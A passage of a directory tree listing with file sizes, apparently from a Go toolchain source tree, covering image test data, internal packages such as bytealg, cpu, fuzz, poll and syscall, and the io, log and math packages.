│ │ │ │ │ ├── [ 176] ftbbn0g01.png
│ │ │ │ │ ├── [2.2K] ftbbn0g01.sng
│ │ │ │ │ ├── [ 197] ftbbn0g02.png
│ │ │ │ │ ├── [2.2K] ftbbn0g02.sng
│ │ │ │ │ ├── [ 429] ftbbn0g04.png
│ │ │ │ │ ├── [2.2K] ftbbn0g04.sng
│ │ │ │ │ ├── [2.0K] ftbbn2c16.png
│ │ │ │ │ ├── [ 13K] ftbbn2c16.sng
│ │ │ │ │ ├── [1.5K] ftbbn3p08.png
│ │ │ │ │ ├── [ 14K] ftbbn3p08.sng
│ │ │ │ │ ├── [2.0K] ftbgn2c16.png
│ │ │ │ │ ├── [ 13K] ftbgn2c16.sng
│ │ │ │ │ ├── [1.5K] ftbgn3p08.png
│ │ │ │ │ ├── [ 14K] ftbgn3p08.sng
│ │ │ │ │ ├── [1.6K] ftbrn2c08.png
│ │ │ │ │ ├── [7.2K] ftbrn2c08.sng
│ │ │ │ │ ├── [1.3K] ftbwn0g16.png
│ │ │ │ │ ├── [5.2K] ftbwn0g16.sng
│ │ │ │ │ ├── [1.5K] ftbwn3p08.png
│ │ │ │ │ ├── [ 14K] ftbwn3p08.sng
│ │ │ │ │ ├── [1.5K] ftbyn3p08.png
│ │ │ │ │ ├── [ 14K] ftbyn3p08.sng
│ │ │ │ │ ├── [ 719] ftp0n0g08.png
│ │ │ │ │ ├── [2.2K] ftp0n0g08.sng
│ │ │ │ │ ├── [1.6K] ftp0n2c08.png
│ │ │ │ │ ├── [7.2K] ftp0n2c08.sng
│ │ │ │ │ ├── [1.4K] ftp0n3p08.png
│ │ │ │ │ ├── [ 14K] ftp0n3p08.sng
│ │ │ │ │ ├── [1.4K] ftp1n3p08.png
│ │ │ │ │ ├── [ 14K] ftp1n3p08.sng
│ │ │ │ │ ├── [1.0K] README
│ │ │ │ │ └── [2.7K] README.original
│ │ │ │ └── [ 14K] writer.go
│ │ │ ├── [4.0K] testdata
│ │ │ │ ├── [1.4K] triangle-001.gif
│ │ │ │ ├── [ 19K] video-001.221212.jpeg
│ │ │ │ ├── [ 29K] video-001.221212.png
│ │ │ │ ├── [6.1K] video-001.5bpp.gif
│ │ │ │ ├── [ 19K] video-001.cmyk.jpeg
│ │ │ │ ├── [ 25K] video-001.cmyk.png
│ │ │ │ ├── [ 13K] video-001.gif
│ │ │ │ ├── [ 14K] video-001.interlaced.gif
│ │ │ │ ├── [ 21K] video-001.jpeg
│ │ │ │ ├── [ 29K] video-001.png
│ │ │ │ ├── [ 20K] video-001.progressive.jpeg
│ │ │ │ ├── [7.3K] video-001.progressive.truncated.jpeg
│ │ │ │ ├── [ 23K] video-001.progressive.truncated.png
│ │ │ │ ├── [3.2K] video-001.q50.410.jpeg
│ │ │ │ ├── [3.1K] video-001.q50.410.progressive.jpeg
│ │ │ │ ├── [3.3K] video-001.q50.411.jpeg
│ │ │ │ ├── [3.2K] video-001.q50.411.progressive.jpeg
│ │ │ │ ├── [3.3K] video-001.q50.420.jpeg
│ │ │ │ ├── [3.2K] video-001.q50.420.progressive.jpeg
│ │ │ │ ├── [3.5K] video-001.q50.422.jpeg
│ │ │ │ ├── [3.4K] video-001.q50.422.progressive.jpeg
│ │ │ │ ├── [3.6K] video-001.q50.440.jpeg
│ │ │ │ ├── [3.4K] video-001.q50.440.progressive.jpeg
│ │ │ │ ├── [3.9K] video-001.q50.444.jpeg
│ │ │ │ ├── [3.8K] video-001.q50.444.progressive.jpeg
│ │ │ │ ├── [6.1K] video-001.rgb.jpeg
│ │ │ │ ├── [ 20K] video-001.rgb.png
│ │ │ │ ├── [ 14K] video-001.separate.dc.progression.jpeg
│ │ │ │ ├── [ 14K] video-001.separate.dc.progression.progressive.jpeg
│ │ │ │ ├── [ 14K] video-005.gray.gif
│ │ │ │ ├── [5.5K] video-005.gray.jpeg
│ │ │ │ ├── [ 15K] video-005.gray.png
│ │ │ │ ├── [2.7K] video-005.gray.q50.2x2.jpeg
│ │ │ │ ├── [2.6K] video-005.gray.q50.2x2.progressive.jpeg
│ │ │ │ ├── [2.7K] video-005.gray.q50.jpeg
│ │ │ │ └── [2.6K] video-005.gray.q50.progressive.jpeg
│ │ │ └── [8.7K] ycbcr.go
│ │ ├── [4.0K] index
│ │ │ └── [4.0K] suffixarray
│ │ │ ├── [1.9K] gen.go
│ │ │ ├── [ 52K] sais2.go
│ │ │ ├── [ 32K] sais.go
│ │ │ └── [9.5K] suffixarray.go
│ │ ├── [4.0K] internal
│ │ │ ├── [4.0K] abi
│ │ │ │ ├── [ 399] abi_amd64.go
│ │ │ │ ├── [ 301] abi_arm64.go
│ │ │ │ ├── [1.3K] abi_generic.go
│ │ │ │ ├── [4.1K] abi.go
│ │ │ │ ├── [ 341] abi_ppc64x.go
│ │ │ │ ├── [ 336] abi_riscv64.go
│ │ │ │ ├── [ 603] abi_test.s
│ │ │ │ └── [4.0K] testdata
│ │ │ │ ├── [ 606] x.go
│ │ │ │ └── [ 189] x.s
│ │ │ ├── [4.0K] buildcfg
│ │ │ │ ├── [3.3K] cfg.go
│ │ │ │ └── [5.4K] exp.go
│ │ │ ├── [4.0K] bytealg
│ │ │ │ ├── [3.7K] bytealg.go
│ │ │ │ ├── [2.6K] compare_386.s
│ │ │ │ ├── [4.2K] compare_amd64.s
│ │ │ │ ├── [2.1K] compare_arm64.s
│ │ │ │ ├── [1.8K] compare_arm.s
│ │ │ │ ├── [1.0K] compare_generic.go
│ │ │ │ ├── [1.7K] compare_mips64x.s
│ │ │ │ ├── [1.4K] compare_mipsx.s
│ │ │ │ ├── [ 635] compare_native.go
│ │ │ │ ├── [6.6K] compare_ppc64x.s
│ │ │ │ ├── [3.2K] compare_riscv64.s
│ │ │ │ ├── [1.2K] compare_s390x.s
│ │ │ │ ├── [1.4K] compare_wasm.s
│ │ │ │ ├── [4.0K] count_amd64.s
│ │ │ │ ├── [2.0K] count_arm64.s
│ │ │ │ ├── [ 917] count_arm.s
│ │ │ │ ├── [ 488] count_generic.go
│ │ │ │ ├── [ 643] count_native.go
│ │ │ │ ├── [2.6K] count_ppc64x.s
│ │ │ │ ├── [ 768] count_riscv64.s
│ │ │ │ ├── [5.4K] count_s390x.s
│ │ │ │ ├── [2.1K] equal_386.s
│ │ │ │ ├── [2.7K] equal_amd64.s
│ │ │ │ ├── [2.4K] equal_arm64.s
│ │ │ │ ├── [1.8K] equal_arm.s
│ │ │ │ ├── [ 628] equal_generic.go
│ │ │ │ ├── [2.0K] equal_mips64x.s
│ │ │ │ ├── [1.1K] equal_mipsx.s
│ │ │ │ ├── [ 789] equal_native.go
│ │ │ │ ├── [2.2K] equal_ppc64x.s
│ │ │ │ ├── [2.3K] equal_riscv64.s
│ │ │ │ ├── [1.8K] equal_s390x.s
│ │ │ │ ├── [1.1K] equal_wasm.s
│ │ │ │ ├── [ 617] index_amd64.go
│ │ │ │ ├── [5.0K] index_amd64.s
│ │ │ │ ├── [ 706] index_arm64.go
│ │ │ │ ├── [3.9K] index_arm64.s
│ │ │ │ ├── [ 647] indexbyte_386.s
│ │ │ │ ├── [3.1K] indexbyte_amd64.s
│ │ │ │ ├── [3.3K] indexbyte_arm64.s
│ │ │ │ ├── [ 951] indexbyte_arm.s
│ │ │ │ ├── [ 553] indexbyte_generic.go
│ │ │ │ ├── [ 985] indexbyte_mips64x.s
│ │ │ │ ├── [1012] indexbyte_mipsx.s
│ │ │ │ ├── [ 415] indexbyte_native.go
│ │ │ │ ├── [9.6K] indexbyte_ppc64x.s
│ │ │ │ ├── [ 934] indexbyte_riscv64.s
│ │ │ │ ├── [2.5K] indexbyte_s390x.s
│ │ │ │ ├── [2.5K] indexbyte_wasm.s
│ │ │ │ ├── [ 901] index_generic.go
│ │ │ │ ├── [ 586] index_native.go
│ │ │ │ ├── [ 657] index_ppc64x.go
│ │ │ │ ├── [ 27K] index_ppc64x.s
│ │ │ │ ├── [1011] index_s390x.go
│ │ │ │ └── [5.5K] index_s390x.s
│ │ │ ├── [4.0K] cfg
│ │ │ │ └── [1.1K] cfg.go
│ │ │ ├── [4.0K] cpu
│ │ │ │ ├── [ 231] cpu_arm64_android.go
│ │ │ │ ├── [ 939] cpu_arm64_darwin.go
│ │ │ │ ├── [ 849] cpu_arm64_freebsd.go
│ │ │ │ ├── [ 812] cpu_arm64.go
│ │ │ │ ├── [2.0K] cpu_arm64_hwcap.go
│ │ │ │ ├── [ 250] cpu_arm64_linux.go
│ │ │ │ ├── [ 454] cpu_arm64_other.go
│ │ │ │ ├── [ 439] cpu_arm64.s
│ │ │ │ ├── [ 821] cpu_arm.go
│ │ │ │ ├── [6.6K] cpu.go
│ │ │ │ ├── [ 671] cpu_mips64x.go
│ │ │ │ ├── [ 220] cpu_mips.go
│ │ │ │ ├── [ 220] cpu_mipsle.go
│ │ │ │ ├── [ 598] cpu_no_name.go
│ │ │ │ ├── [ 461] cpu_ppc64x_aix.go
│ │ │ │ ├── [ 481] cpu_ppc64x.go
│ │ │ │ ├── [ 804] cpu_ppc64x_linux.go
│ │ │ │ ├── [ 220] cpu_riscv64.go
│ │ │ │ ├── [ 276] cpu.s
│ │ │ │ ├── [5.9K] cpu_s390x.go
│ │ │ │ ├── [2.2K] cpu_s390x.s
│ │ │ │ ├── [ 220] cpu_wasm.go
│ │ │ │ ├── [4.9K] cpu_x86.go
│ │ │ │ └── [ 831] cpu_x86.s
│ │ │ ├── [4.0K] diff
│ │ │ │ ├── [7.5K] diff.go
│ │ │ │ └── [4.0K] testdata
│ │ │ │ ├── [ 91] allnew.txt
│ │ │ │ ├── [ 91] allold.txt
│ │ │ │ ├── [ 266] basic.txt
│ │ │ │ ├── [ 141] dups.txt
│ │ │ │ ├── [ 178] end.txt
│ │ │ │ ├── [ 130] eof1.txt
│ │ │ │ ├── [ 130] eof2.txt
│ │ │ │ ├── [ 47] eof.txt
│ │ │ │ ├── [ 253] long.txt
│ │ │ │ ├── [ 55] same.txt
│ │ │ │ ├── [ 142] start.txt
│ │ │ │ └── [ 356] triv.txt
│ │ │ ├── [4.0K] execabs
│ │ │ │ └── [1.8K] execabs.go
│ │ │ ├── [4.0K] fmtsort
│ │ │ │ └── [5.8K] sort.go
│ │ │ ├── [4.0K] fuzz
│ │ │ │ ├── [ 840] counters_supported.go
│ │ │ │ ├── [1.1K] counters_unsupported.go
│ │ │ │ ├── [2.5K] coverage.go
│ │ │ │ ├── [ 11K] encoding.go
│ │ │ │ ├── [ 34K] fuzz.go
│ │ │ │ ├── [4.5K] mem.go
│ │ │ │ ├── [2.3K] minimize.go
│ │ │ │ ├── [6.8K] mutator.go
│ │ │ │ ├── [7.7K] mutators_byteslice.go
│ │ │ │ ├── [3.3K] pcg.go
│ │ │ │ ├── [1.5K] queue.go
│ │ │ │ ├── [4.1K] sys_posix.go
│ │ │ │ ├── [ 933] sys_unimplemented.go
│ │ │ │ ├── [4.6K] sys_windows.go
│ │ │ │ ├── [1.1K] trace.go
│ │ │ │ └── [ 37K] worker.go
│ │ │ ├── [4.0K] goarch
│ │ │ │ ├── [1.4K] gengoarch.go
│ │ │ │ ├── [ 328] goarch_386.go
│ │ │ │ ├── [ 329] goarch_amd64.go
│ │ │ │ ├── [ 325] goarch_arm64.go
│ │ │ │ ├── [ 328] goarch_arm.go
│ │ │ │ ├── [2.1K] goarch.go
│ │ │ │ ├── [ 331] goarch_mips64.go
│ │ │ │ ├── [ 331] goarch_mips64le.go
│ │ │ │ ├── [ 329] goarch_mips.go
│ │ │ │ ├── [ 329] goarch_mipsle.go
│ │ │ │ ├── [ 326] goarch_ppc64.go
│ │ │ │ ├── [ 326] goarch_ppc64le.go
│ │ │ │ ├── [ 331] goarch_riscv64.go
│ │ │ │ ├── [ 329] goarch_s390x.go
│ │ │ │ ├── [ 329] goarch_wasm.go
│ │ │ │ ├── [ 574] zgoarch_386.go
│ │ │ │ ├── [ 578] zgoarch_amd64.go
│ │ │ │ ├── [ 582] zgoarch_arm64be.go
│ │ │ │ ├── [ 578] zgoarch_arm64.go
│ │ │ │ ├── [ 578] zgoarch_armbe.go
│ │ │ │ ├── [ 574] zgoarch_arm.go
│ │ │ │ ├── [ 582] zgoarch_loong64.go
│ │ │ │ ├── [ 580] zgoarch_mips64.go
│ │ │ │ ├── [ 584] zgoarch_mips64le.go
│ │ │ │ ├── [ 586] zgoarch_mips64p32.go
│ │ │ │ ├── [ 590] zgoarch_mips64p32le.go
│ │ │ │ ├── [ 576] zgoarch_mips.go
│ │ │ │ ├── [ 580] zgoarch_mipsle.go
│ │ │ │ ├── [ 578] zgoarch_ppc64.go
│ │ │ │ ├── [ 582] zgoarch_ppc64le.go
│ │ │ │ ├── [ 574] zgoarch_ppc.go
│ │ │ │ ├── [ 582] zgoarch_riscv64.go
│ │ │ │ ├── [ 578] zgoarch_riscv.go
│ │ │ │ ├── [ 576] zgoarch_s390.go
│ │ │ │ ├── [ 578] zgoarch_s390x.go
│ │ │ │ ├── [ 582] zgoarch_sparc64.go
│ │ │ │ ├── [ 578] zgoarch_sparc.go
│ │ │ │ └── [ 576] zgoarch_wasm.go
│ │ │ ├── [4.0K] godebug
│ │ │ │ └── [ 784] godebug.go
│ │ │ ├── [4.0K] goexperiment
│ │ │ │ ├── [ 199] exp_boringcrypto_off.go
│ │ │ │ ├── [ 196] exp_boringcrypto_on.go
│ │ │ │ ├── [ 191] exp_fieldtrack_off.go
│ │ │ │ ├── [ 188] exp_fieldtrack_on.go
│ │ │ │ ├── [ 219] exp_heapminimum512kib_off.go
│ │ │ │ ├── [ 216] exp_heapminimum512kib_on.go
│ │ │ │ ├── [ 215] exp_preemptibleloops_off.go
│ │ │ │ ├── [ 212] exp_preemptibleloops_on.go
│ │ │ │ ├── [ 191] exp_regabiargs_off.go
│ │ │ │ ├── [ 188] exp_regabiargs_on.go
│ │ │ │ ├── [ 207] exp_regabiwrappers_off.go
│ │ │ │ ├── [ 204] exp_regabiwrappers_on.go
│ │ │ │ ├── [ 219] exp_staticlockranking_off.go
│ │ │ │ ├── [ 216] exp_staticlockranking_on.go
│ │ │ │ ├── [ 179] exp_unified_off.go
│ │ │ │ ├── [ 176] exp_unified_on.go
│ │ │ │ ├── [3.2K] flags.go
│ │ │ │ └── [1.7K] mkconsts.go
│ │ │ ├── [4.0K] goos
│ │ │ │ ├── [1.7K] gengoos.go
│ │ │ │ ├── [ 534] goos.go
│ │ │ │ ├── [ 430] zgoos_aix.go
│ │ │ │ ├── [ 438] zgoos_android.go
│ │ │ │ ├── [ 444] zgoos_darwin.go
│ │ │ │ ├── [ 442] zgoos_dragonfly.go
│ │ │ │ ├── [ 438] zgoos_freebsd.go
│ │ │ │ ├── [ 432] zgoos_hurd.go
│ │ │ │ ├── [ 438] zgoos_illumos.go
│ │ │ │ ├── [ 430] zgoos_ios.go
│ │ │ │ ├── [ 428] zgoos_js.go
│ │ │ │ ├── [ 446] zgoos_linux.go
│ │ │ │ ├── [ 436] zgoos_netbsd.go
│ │ │ │ ├── [ 438] zgoos_openbsd.go
│ │ │ │ ├── [ 434] zgoos_plan9.go
│ │ │ │ ├── [ 450] zgoos_solaris.go
│ │ │ │ ├── [ 438] zgoos_windows.go
│ │ │ │ └── [ 430] zgoos_zos.go
│ │ │ ├── [4.0K] goroot
│ │ │ │ ├── [ 597] gccgo.go
│ │ │ │ └── [3.0K] gc.go
│ │ │ ├── [4.0K] goversion
│ │ │ │ └── [ 445] goversion.go
│ │ │ ├── [4.0K] intern
│ │ │ │ └── [6.0K] intern.go
│ │ │ ├── [4.0K] itoa
│ │ │ │ └── [ 733] itoa.go
│ │ │ ├── [4.0K] lazyregexp
│ │ │ │ └── [1.8K] lazyre.go
│ │ │ ├── [4.0K] lazytemplate
│ │ │ │ └── [1.3K] lazytemplate.go
│ │ │ ├── [4.0K] nettrace
│ │ │ │ └── [1.8K] nettrace.go
│ │ │ ├── [4.0K] obscuretestdata
│ │ │ │ └── [1.3K] obscuretestdata.go
│ │ │ ├── [4.0K] oserror
│ │ │ │ └── [ 601] errors.go
│ │ │ ├── [4.0K] pkgbits
│ │ │ │ ├── [ 991] codes.go
│ │ │ │ ├── [7.9K] decoder.go
│ │ │ │ ├── [5.9K] encoder.go
│ │ │ │ ├── [ 493] frames_go17.go
│ │ │ │ ├── [ 476] frames_go1.go
│ │ │ │ ├── [ 732] reloc.go
│ │ │ │ ├── [ 336] support.go
│ │ │ │ ├── [2.5K] sync.go
│ │ │ │ └── [2.8K] syncmarker_string.go
│ │ │ ├── [4.0K] poll
│ │ │ │ ├── [4.8K] copy_file_range_linux.go
│ │ │ │ ├── [ 686] errno_unix.go
│ │ │ │ ├── [ 725] errno_windows.go
│ │ │ │ ├── [ 329] fcntl_js.go
│ │ │ │ ├── [ 375] fcntl_libc.go
│ │ │ │ ├── [ 497] fcntl_syscall.go
│ │ │ │ ├── [ 579] fd_fsync_darwin.go
│ │ │ │ ├── [ 497] fd_fsync_posix.go
│ │ │ │ ├── [ 358] fd_fsync_windows.go
│ │ │ │ ├── [2.7K] fd.go
│ │ │ │ ├── [2.1K] fd_io_plan9.go
│ │ │ │ ├── [6.4K] fd_mutex.go
│ │ │ │ ├── [ 918] fd_opendir_darwin.go
│ │ │ │ ├── [5.3K] fd_plan9.go
│ │ │ │ ├── [2.3K] fd_poll_js.go
│ │ │ │ ├── [3.9K] fd_poll_runtime.go
│ │ │ │ ├── [1.9K] fd_posix.go
│ │ │ │ ├── [ 19K] fd_unix.go
│ │ │ │ ├── [ 34K] fd_windows.go
│ │ │ │ ├── [ 392] fd_writev_darwin.go
│ │ │ │ ├── [ 339] fd_writev_illumos.go
│ │ │ │ ├── [ 589] fd_writev_unix.go
│ │ │ │ ├── [ 395] hook_cloexec.go
│ │ │ │ ├── [ 437] hook_unix.go
│ │ │ │ ├── [ 668] hook_windows.go
│ │ │ │ ├── [ 338] iovec_illumos.go
│ │ │ │ ├── [ 351] iovec_unix.go
│ │ │ │ ├── [1.3K] sendfile_bsd.go
│ │ │ │ ├── [1.2K] sendfile_linux.go
│ │ │ │ ├── [1.5K] sendfile_solaris.go
│ │ │ │ ├── [2.0K] sendfile_windows.go
│ │ │ │ ├── [1.8K] sock_cloexec.go
│ │ │ │ ├── [1.0K] sockopt.go
│ │ │ │ ├── [ 817] sockoptip.go
│ │ │ │ ├── [ 490] sockopt_linux.go
│ │ │ │ ├── [ 480] sockopt_unix.go
│ │ │ │ ├── [ 862] sockopt_windows.go
│ │ │ │ ├── [7.2K] splice_linux.go
│ │ │ │ ├── [ 389] strconv.go
│ │ │ │ ├── [1.1K] sys_cloexec.go
│ │ │ │ └── [1.8K] writev.go
│ │ │ ├── [4.0K] profile
│ │ │ │ ├── [ 14K] encode.go
│ │ │ │ ├── [4.0K] filter.go
│ │ │ │ ├── [ 32K] legacy_profile.go
│ │ │ │ ├── [ 11K] merge.go
│ │ │ │ ├── [ 15K] profile.go
│ │ │ │ ├── [6.9K] proto.go
│ │ │ │ └── [2.4K] prune.go
│ │ │ ├── [4.0K] race
│ │ │ │ ├── [ 448] doc.go
│ │ │ │ ├── [ 619] norace.go
│ │ │ │ └── [ 896] race.go
│ │ │ ├── [4.0K] reflectlite
│ │ │ │ ├── [ 199] asm.s
│ │ │ │ ├── [2.0K] swapper.go
│ │ │ │ ├── [ 25K] type.go
│ │ │ │ └── [ 13K] value.go
│ │ │ ├── [4.0K] singleflight
│ │ │ │ └── [3.2K] singleflight.go
│ │ │ ├── [4.0K] syscall
│ │ │ │ ├── [4.0K] execenv
│ │ │ │ │ ├── [ 489] execenv_default.go
│ │ │ │ │ └── [1.3K] execenv_windows.go
│ │ │ │ ├── [4.0K] unix
│ │ │ │ │ ├── [ 320] asm_aix_ppc64.s
│ │ │ │ │ ├── [ 259] asm_darwin.s
│ │ │ │ │ ├── [ 321] asm_solaris.s
│ │ │ │ │ ├── [ 428] at_aix.go
│ │ │ │ │ ├── [ 884] at_darwin.go
│ │ │ │ │ ├── [1.0K] at_freebsd.go
│ │ │ │ │ ├── [1.3K] at.go
│ │ │ │ │ ├── [1.4K] at_libc.go
│ │ │ │ │ ├── [ 581] at_solaris.go
│ │ │ │ │ ├── [ 235] at_sysnum_darwin.go
│ │ │ │ │ ├── [ 394] at_sysnum_dragonfly.go
│ │ │ │ │ ├── [ 283] at_sysnum_fstatat64_linux.go
│ │ │ │ │ ├── [ 269] at_sysnum_fstatat_linux.go
│ │ │ │ │ ├── [ 350] at_sysnum_linux.go
│ │ │ │ │ ├── [ 398] at_sysnum_netbsd.go
│ │ │ │ │ ├── [ 312] at_sysnum_newfstatat_linux.go
│ │ │ │ │ ├── [ 396] at_sysnum_openbsd.go
│ │ │ │ │ ├── [ 556] copy_file_range_linux.go
│ │ │ │ │ ├── [ 447] fcntl_linux_32bit.go
│ │ │ │ │ ├── [ 765] getentropy_darwin.go
│ │ │ │ │ ├── [ 554] getentropy_openbsd.go
│ │ │ │ │ ├── [ 476] getrandom_dragonfly.go
│ │ │ │ │ ├── [ 466] getrandom_freebsd.go
│ │ │ │ │ ├── [ 894] getrandom.go
│ │ │ │ │ ├── [ 391] getrandom_linux.go
│ │ │ │ │ ├── [1.2K] getrandom_solaris.go
│ │ │ │ │ ├── [ 679] ioctl_aix.go
│ │ │ │ │ ├── [1.5K] net.go
│ │ │ │ │ ├── [1.2K] net_js.go
│ │ │ │ │ ├── [ 650] nonblocking.go
│ │ │ │ │ ├── [ 274] nonblocking_js.go
│ │ │ │ │ ├── [ 573] nonblocking_libc.go
│ │ │ │ │ ├── [ 250] sysnum_linux_386.go
│ │ │ │ │ ├── [ 250] sysnum_linux_amd64.go
│ │ │ │ │ ├── [ 250] sysnum_linux_arm.go
│ │ │ │ │ ├── [ 496] sysnum_linux_generic.go
│ │ │ │ │ ├── [ 283] sysnum_linux_mips64x.go
│ │ │ │ │ ├── [ 279] sysnum_linux_mipsx.go
│ │ │ │ │ ├── [ 279] sysnum_linux_ppc64x.go
│ │ │ │ │ ├── [ 250] sysnum_linux_s390x.go
│ │ │ │ │ └── [ 655] writev_illumos.go
│ │ │ │ └── [4.0K] windows
│ │ │ │ ├── [ 360] mksyscall.go
│ │ │ │ ├── [ 725] net_windows.go
│ │ │ │ ├── [ 716] psapi_windows.go
│ │ │ │ ├── [4.0K] registry
│ │ │ │ │ ├── [5.4K] key.go
│ │ │ │ │ ├── [ 300] mksyscall.go
│ │ │ │ │ ├── [1.5K] syscall.go
│ │ │ │ │ ├── [ 11K] value.go
│ │ │ │ │ └── [4.0K] zsyscall_windows.go
│ │ │ │ ├── [3.1K] reparse_windows.go
│ │ │ │ ├── [3.7K] security_windows.go
│ │ │ │ ├── [1.6K] symlink_windows.go
│ │ │ │ ├── [ 10K] syscall_windows.go
│ │ │ │ ├── [4.0K] sysdll
│ │ │ │ │ └── [1.1K] sysdll.go
│ │ │ │ └── [ 12K] zsyscall_windows.go
│ │ │ ├── [4.0K] sysinfo
│ │ │ │ └── [ 728] sysinfo.go
│ │ │ ├── [4.0K] testenv
│ │ │ │ ├── [ 225] testenv_cgo.go
│ │ │ │ ├── [ 13K] testenv.go
│ │ │ │ ├── [ 386] testenv_notunix.go
│ │ │ │ ├── [ 357] testenv_notwin.go
│ │ │ │ ├── [ 343] testenv_unix.go
│ │ │ │ └── [1.0K] testenv_windows.go
│ │ │ ├── [4.0K] testlog
│ │ │ │ ├── [ 981] exit.go
│ │ │ │ └── [1.9K] log.go
│ │ │ ├── [4.0K] trace
│ │ │ │ ├── [ 22K] gc.go
│ │ │ │ ├── [8.7K] goroutines.go
│ │ │ │ ├── [ 761] mkcanned.bash
│ │ │ │ ├── [5.7K] mud.go
│ │ │ │ ├── [7.3K] order.go
│ │ │ │ ├── [ 35K] parser.go
│ │ │ │ ├── [4.0K] testdata
│ │ │ │ │ ├── [2.1K] http_1_10_good
│ │ │ │ │ ├── [2.7K] http_1_11_good
│ │ │ │ │ ├── [ 41K] http_1_5_good
│ │ │ │ │ ├── [1.9K] http_1_7_good
│ │ │ │ │ ├── [2.1K] http_1_9_good
│ │ │ │ │ ├── [362K] stress_1_10_good
│ │ │ │ │ ├── [361K] stress_1_11_good
│ │ │ │ │ ├── [7.3K] stress_1_5_good
│ │ │ │ │ ├── [8.0K] stress_1_5_unordered
│ │ │ │ │ ├── [387K] stress_1_7_good
│ │ │ │ │ ├── [357K] stress_1_9_good
│ │ │ │ │ ├── [6.2K] stress_start_stop_1_10_good
│ │ │ │ │ ├── [4.8K] stress_start_stop_1_11_good
│ │ │ │ │ ├── [6.8K] stress_start_stop_1_5_good
│ │ │ │ │ ├── [2.0K] stress_start_stop_1_7_good
│ │ │ │ │ ├── [6.1K] stress_start_stop_1_9_good
│ │ │ │ │ └── [2.0K] user_task_span_1_11_good
│ │ │ │ └── [1014] writer.go
│ │ │ ├── [4.0K] txtar
│ │ │ │ └── [4.2K] archive.go
│ │ │ ├── [4.0K] unsafeheader
│ │ │ │ └── [1.1K] unsafeheader.go
│ │ │ └── [4.0K] xcoff
│ │ │ ├── [5.6K] ar.go
│ │ │ ├── [ 17K] file.go
│ │ │ ├── [4.0K] testdata
│ │ │ │ ├── [ 128] bigar-empty
│ │ │ │ ├── [2.4K] bigar-ppc64
│ │ │ │ ├── [ 53K] gcc-ppc32-aix-dwarf2-exec
│ │ │ │ ├── [ 56K] gcc-ppc64-aix-dwarf2-exec
│ │ │ │ ├── [ 85] hello.c
│ │ │ │ ├── [ 61] printbye.c
│ │ │ │ └── [ 66] printhello.c
│ │ │ └── [ 12K] xcoff.go
│ │ ├── [4.0K] io
│ │ │ ├── [4.0K] fs
│ │ │ │ ├── [9.1K] fs.go
│ │ │ │ ├── [2.8K] glob.go
│ │ │ │ ├── [1.8K] readdir.go
│ │ │ │ ├── [1.8K] readfile.go
│ │ │ │ ├── [ 797] stat.go
│ │ │ │ ├── [3.6K] sub.go
│ │ │ │ └── [4.5K] walk.go
│ │ │ ├── [ 20K] io.go
│ │ │ ├── [4.0K] ioutil
│ │ │ │ ├── [3.2K] ioutil.go
│ │ │ │ ├── [1.7K] tempfile.go
│ │ │ │ └── [4.0K] testdata
│ │ │ │ └── [ 16] hello
│ │ │ ├── [3.3K] multi.go
│ │ │ └── [5.1K] pipe.go
│ │ ├── [4.0K] log
│ │ │ ├── [ 12K] log.go
│ │ │ └── [4.0K] syslog
│ │ │ ├── [ 935] doc.go
│ │ │ ├── [7.5K] syslog.go
│ │ │ └── [ 758] syslog_unix.go
│ │ ├── [7.8K] make.bash
│ │ ├── [4.8K] make.bat
│ │ ├── [ 553] Make.dist
│ │ ├── [3.4K] make.rc
│ │ ├── [4.0K] math
│ │ │ ├── [ 366] abs.go
│ │ │ ├── [1.7K] acosh.go
│ │ │ ├── [4.3K] acosh_s390x.s
│ │ │ ├── [3.7K] acos_s390x.s
│ │ │ ├── [3.7K] arith_s390x.go
│ │ │ ├── [1.1K] asin.go
│ │ │ ├── [1.9K] asinh.go
│ │ │ ├── [5.7K] asinh_s390x.s
│ │ │ ├── [4.2K] asin_s390x.s
│ │ │ ├── [1.5K] atan2.go
│ │ │ ├── [6.9K] atan2_s390x.s
│ │ │ ├── [3.0K] atan.go
│ │ │ ├── [2.0K] atanh.go
│ │ │ ├── [5.4K] atanh_s390x.s
│ │ │ ├── [3.7K] atan_s390x.s
│ │ │ ├── [4.0K] big
│ │ │ │ ├── [ 414] accuracy_string.go
│ │ │ │ ├── [4.2K] arith_386.s
│ │ │ │ ├── [ 306] arith_amd64.go
│ │ │ │ ├── [9.2K] arith_amd64.s
│ │ │ │ ├── [ 12K] arith_arm64.s
│ │ │ │ ├── [4.2K] arith_arm.s
│ │ │ │ ├── [ 630] arith_decl.go
│ │ │ │ ├── [1.1K] arith_decl_pure.go
│ │ │ │ ├── [ 531] arith_decl_s390x.go
│ │ │ │ ├── [8.3K] arith.go
│ │ │ │ ├── [ 865] arith_mips64x.s
│ │ │ │ ├── [ 857] arith_mipsx.s
│ │ │ │ ├── [ 17K] arith_ppc64x.s
│ │ │ │ ├── [ 966] arith_riscv64.s
│ │ │ │ ├── [ 20K] arith_s390x.s
│ │ │ │ ├── [ 689] arith_wasm.s
│ │ │ │ ├── [6.6K] decimal.go
│ │ │ │ ├── [3.8K] doc.go
│ │ │ │ ├── [8.3K] floatconv.go
│ │ │ │ ├── [ 44K] float.go
│ │ │ │ ├── [3.3K] floatmarsh.go
│ │ │ │ ├── [ 14K] ftoa.go
│ │ │ │ ├── [6.7K] intconv.go
│ │ │ │ ├── [ 30K] int.go
│ │ │ │ ├── [2.1K] intmarsh.go
│ │ │ │ ├── [ 15K] natconv.go
│ │ │ │ ├── [ 34K] natdiv.go
│ │ │ │ ├── [ 27K] nat.go
│ │ │ │ ├── [ 10K] prime.go
│ │ │ │ ├── [9.8K] ratconv.go
│ │ │ │ ├── [ 13K] rat.go
│ │ │ │ ├── [1.9K] ratmarsh.go
│ │ │ │ ├── [ 501] roundingmode_string.go
│ │ │ │ └── [2.8K] sqrt.go
│ │ │ ├── [4.0K] bits
│ │ │ │ ├── [ 621] bits_errors_bootstrap.go
│ │ │ │ ├── [ 398] bits_errors.go
│ │ │ │ ├── [ 17K] bits.go
│ │ │ │ ├── [4.7K] bits_tables.go
│ │ │ │ ├── [3.1K] make_examples.go
│ │ │ │ └── [1.6K] make_tables.go
│ │ │ ├── [1.9K] bits.go
│ │ │ ├── [2.3K] cbrt.go
│ │ │ ├── [4.9K] cbrt_s390x.s
│ │ │ ├── [4.0K] cmplx
│ │ │ │ ├── [ 523] abs.go
│ │ │ │ ├── [5.9K] asin.go
│ │ │ │ ├── [ 292] conj.go
│ │ │ │ ├── [2.1K] exp.go
│ │ │ │ ├── [ 506] isinf.go
│ │ │ │ ├── [ 598] isnan.go
